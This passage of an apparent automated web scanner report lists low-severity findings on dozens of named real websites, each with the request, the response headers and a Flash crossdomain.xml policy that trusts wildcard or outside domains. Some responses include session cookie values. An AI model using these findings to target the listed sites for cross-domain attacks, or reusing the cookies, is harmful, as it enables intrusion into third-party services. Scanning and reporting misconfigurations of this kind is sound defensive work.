7.434. http://www.sportsauthority.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sportsauthority.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sportsauthority.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4dc032-35e-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 862
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:07:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="tsa.imageg.net" />
<allo
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.174" />
<allow-access-from domain="172.21.1.174" />
<allow-access-from domain="206.16.220.174" />
<allow-access-from domain="63.240.110.174" />
<allow-access-from domain="pm.allurent.net" />
<allow-access-from domain="*.pm.allurent.net" />
<allow-access-from domain="*.shared.allurent.net" />
<allow-access-from domain="*.sportsauthority.allurent.net" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...
7.435. http://www.star-telegram.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.star-telegram.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.star-telegram.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Mon, 22 Jun 2009 18:43:30 GMT
ETag: "4112e8-db-4a3fd0d2"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:05:56 GMT
Content-Length: 219
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.star-telegram.com" />
</cro
...[SNIP]...
7.436. http://www.startribune.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.startribune.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.startribune.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:01:28 GMT
X-Server-Name: sj-c14-r8-u31-b5
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Apr 2011 13:37:30 GMT
Content-Length: 907
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*.startribune.com" />
<allow-access-from domain="cms.clickability.com" />
<allow-access-from domain="ww2.startribune.com" />
<allow-access-from domain="webdev1.startribune.com" />
<allow-access-from domain="www.printthis.clickability.com" />
<allow-access-from domain="dev.www.startribune.com" />
<allow-access-from domain="stage.www.startribune.com" />
<allow-access-from domain="prepstest.startribune.com" />
<allow-access-from domain="preps.startribune.com" />
<allow-access-from domain="gamefacemn.startribune.com" />
<allow-access-from domain="elections.startribune.com" />
<allow-access-from domain="dev.beta.startribune.com" />
<allow-access-from domain="stage.beta.startribune.com" />
...[SNIP]...
7.437. http://www.stumbleupon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:29 GMT
Content-Type: application/xml
Content-Length: 460
Date: Sat, 02 Apr 2011 12:38:09 GMT
X-Varnish: 818641328
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...
7.438. http://www.stylelist.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stylelist.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:40 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=999972
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...
7.439. http://www.superpages.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.superpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:28 GMT
Server: Unspecified
Vary: Host
Last-Modified: Tue, 29 Mar 2011 15:26:29 GMT
ETag: "1b6e-d7-af271340"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 13:39:28 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.kewlbox.com" />
</cross
...[SNIP]...
7.440. http://www.symantec.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Cache-Control: public, max-age=2219
Date: Sat, 02 Apr 2011 13:26:53 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...
7.441. http://www.t-mobile.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.t-mobile.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 10 Aug 2009 20:02:39 GMT
Accept-Ranges: bytes
ETag: "8099f83f519ca1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Content-Length: 603

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="convertlanguage.com"/>
   <allow-access-from domain="*.convertlanguage.com"/>
   <allow-access-from domain="207.211.37.60"/>
   <allow-access-from domain="t-mobile.com"/>
   <allow-access-from domain="*.t-mobile.com"/>
   <allow-access-from domain="es.t-mobile.com"/>
   <allow-access-from domain="estmobile.convertlanguage.com"/>
   <allow-access-from domain="support.t-mobile.com"/>
   <allow-access-from domain="*.tmocache.com"/>
...[SNIP]...
7.442. http://www.tagged.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:08 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "25b7fc-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...
7.443. http://www.target.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.target.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.target.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:20 GMT
Server: Server
Last-Modified: Fri, 14 Jan 2011 22:27:33 GMT
ETag: "13d-f0bf5f40"
Accept-Ranges: bytes
Content-Length: 317
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="*.images-amazon.com" />
<allow-access-from domain="*.target.com" />
...[SNIP]...
7.444. http://www.tarot.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tarot.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:57 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
Last-Modified: Thu, 28 Oct 2010 18:08:21 GMT
ETag: "2f1af0-b0-493b13a276f40"
Accept-Ranges: bytes
Content-Length: 176
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.yourminis.com"/>
</cross-domain-policy>
7.445. http://www.tasteofhome.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tasteofhome.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tasteofhome.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:51:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: application/xml; charset=utf-8
Content-Length: 430

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="72.3.226.28" secure="true" />
...[SNIP]...
<allow-access-from domain="*.isg-marketing.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tasteofhome.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.reimanpub.com" secure="true" />
...[SNIP]...
7.446. http://www.telegraph.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.telegraph.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"1150-1301643454000"
Last-Modified: Fri, 01 Apr 2011 07:37:34 GMT
Content-Length: 1150
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:59 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="telegraph.co.uk"/>
<allow-access-from domain="*.telegraph.co.uk"/>
<allow-access-from domain="telegraphquiz.cfmx.flarecreative.com"/>
<allow-access-from domain="213.187.32.58"/>
<allow-access-from domain="213.187.48.185"/>
<allow-access-from domain="tgquiz.pavo.flarecreative.com"/>
<allow-access-from domain="ad.uk.doubleclick.net"/>
<allow-access-from domain="st.sand.msn-int.com" secure="true"/>
<allow-access-from domain="*.msn.com" secure="true"/>
<allow-access-from domain="services.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.videoegg.com"/>
<allow-access-from domain="*.bebo.com"/>
<allow-access-from domain="*.hi5.com"/>
<allow-access-from domain="*.wayn.com"/>
<allow-access-from domain="*.tagged.com"/>
<allow-access-from domain="*.ringo.com"/>
<allow-access-from domain="dailytelegraph.accuweather.com"/>
<allow-access-from domain="skin.issuu.com" />
<allow-access-from domain="static.issuu.com" />
<allow-access-from domain="bestbuys.tmg.s3.amazonaws.com" />
<allow-access-from domain="*.washingtonpost.com" />
...[SNIP]...
7.447. http://www.thefrisky.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefrisky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefrisky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 19 May 2010 20:33:54 GMT
ETag: "1ad31f-ff-486f86063b080"
Accept-Ranges: bytes
Content-Length: 255
Content-Type: text/xml
Cache-Control: max-age=208322
Date: Sat, 02 Apr 2011 13:33:13 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.turner.com" />
<allow-access-from domain="*.thefrisky.com" />
...[SNIP]...
7.448. http://www.thirdage.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thirdage.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Varnish: 635032720
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:40:55 GMT
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Drupal-Cache: MISS
X-Varnish-Cache: MISS
Web-Head: web09.advomatic.com
Via: 1.1 varnish
Connection: close
Last-Modified: Sat, 02 Apr 2011 13:40:55 +0000
X-Powered-By: PHP/5.2.6-1+lenny9
Age: 0
Content-Length: 267

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.thirdage.com" />
<allow-access-from domain="*.www.thirdage.com" />
...[SNIP]...
7.449. http://www.ticketmaster.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "4c3-b383d900"
Accept-Ranges: bytes
Content-Length: 1219
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:24:52 GMT
Connection: close
Set-Cookie: SID=jrXWRzktqCwRzz16qiA4zQ0W2flVKZEniPvK5uxMvQ4Gfx_GwXru5DUOn80tbDCL_KoHKSFmkyaATJd6; path=/; domain=.ticketmaster.com
Set-Cookie: BID=5RMDQStWthnUtUuXYQ0pCAVC6zrpzTDWi214mGhkR1p2xGpyCJh0D3F3LJvkexWGjXbwtGCUvwxER0HdQekm; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=XrPER0aDfUK1iRLntV5jCejZQ4h2SKcKRhEFfxWHOjraechpoisySw==; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ticketmaster.co.nz" />
<allow-access-from domain="*.ticketmaster.co.uk" />
<allow-access-from domain="*.ticketmaster.com" />
<allow-access-from domain="*.ticketmaster.com.au" />
<allow-access-from domain="*.ticketmaster.com.mx" />
<allow-access-from domain="*.ticketmaster.de" />
<allow-access-from domain="*.ticketmaster.ie" />
<allow-access-from domain="*.ticketmaster.es" />
<allow-access-from domain="*.ticketmaster.eu" />
<allow-access-from domain="*.ticketmaster.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmcs" secure="false" />
...[SNIP]...
<allow-access-from domain="ticketmaster.com" />
...[SNIP]...
<allow-access-from domain="ticketmaster.de" />
<allow-access-from domain="ticketmaster.ie" />
<allow-access-from domain="ticketmaster.es" />
<allow-access-from domain="ticketmaster.eu" />
...[SNIP]...
7.450. http://www.tigerdirect.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 794
Content-Type: text/xml
Last-Modified: Fri, 10 Sep 2010 18:55:14 GMT
Accept-Ranges: bytes
ETag: "38d3bcb31951cb1:8574"
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:17 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.compusa.com" />
<allow-access-from domain="*.compusa.pr" />
<allow-access-from domain="images.highspeedbackbone.net" />
...[SNIP]...
<allow-access-from domain="retail.tigerdirect.com" />
   <allow-access-from domain="www.tigerdirect.ca" />
<allow-access-from domain="retail.tigertirect.ca" />
   <allow-access-from domain="www.circuitcity.com" />
   <allow-access-from domain="com.puter.tv" />
   <allow-access-from domain="compusa.tv" />
   <allow-access-from domain="pinkfriday.org" />
   <allow-access-from domain="charitypcrace.com" />
...[SNIP]...
7.451. http://www.tinypic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tinypic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tinypic.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:37:28 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Fri, 17 Apr 2009 13:33:18 GMT
ETag: "394-39350380"
Accept-Ranges: bytes
Content-Length: 916
Age: 234
X-Cache: HIT from tinypic.com
Via: 1.0 den2tpsq04:80 (squid)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.tinypic.com" />
<allow-access-from domain="tinypic.com" />
<allow-access-from domain="*.photobucket.com" />
<allow-access-from domain="photobucket.com" />
<allow-access-from domain="*.dancejam.com" />
<allow-access-from domain="dancejam.com" />
<allow-access-from domain="*.fotoflexer.com"/>
<allow-access-from domain="fotoflexer.com"/>
<allow-access-from domain="*.flektor.com"/>
<allow-access-from domain="flektor.com"/>
<allow-access-from domain="*.picnik.com"/>
<allow-access-from domain="picnik.com"/>
<allow-access-from domain="*.glogster.com"/>
<allow-access-from domain="glogster.com"/>
...[SNIP]...
7.452. http://www.tmz.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tmz.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:29 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 19:01:17 GMT
ETag: "12383e6-3c6-486f7152a9940"
Accept-Ranges: bytes
Content-Length: 966
Connection: close
Content-Type: application/xml
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<cross-domain-policy>
<allow-access-from domain="*.tmz.com"/>
<allow-access-from domain="*.tmzdev.com"/>
<allow-access-from domain="*.blogsmithmedia.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.symbolforce.com"/>
<allow-access-from domain="*.yourminis.com"/>
<allow-access-from domain="*.tmz.vo.llnwd.net"/>
<allow-access-from domain="creative.myspace.com"/>
<allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="creative.myspacecdn.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.celebritytweet.com"/>
<allow-access-from domain="adserver.adtechus.com"/>
<allow-access-from domain="aka-cdn-ns.adtechus.com"/>
<allow-access-from domain="cdn.tremormedia.com"/>
<allow-access-from domain="adserver.adtech.de"/>
<allow-access-from domain="aka-cdn-ns.adtech.de"/>
<allow-access-from domain="t-ll-assets.cfec2.net"/>
...[SNIP]...
7.453. http://www.toptenreviews.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toptenreviews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toptenreviews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:38 GMT
Server: Apache
Last-Modified: Thu, 05 Nov 2009 17:31:54 GMT
ETag: "6a4059-153-477a31a739680"
Accept-Ranges: bytes
Content-Length: 339
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
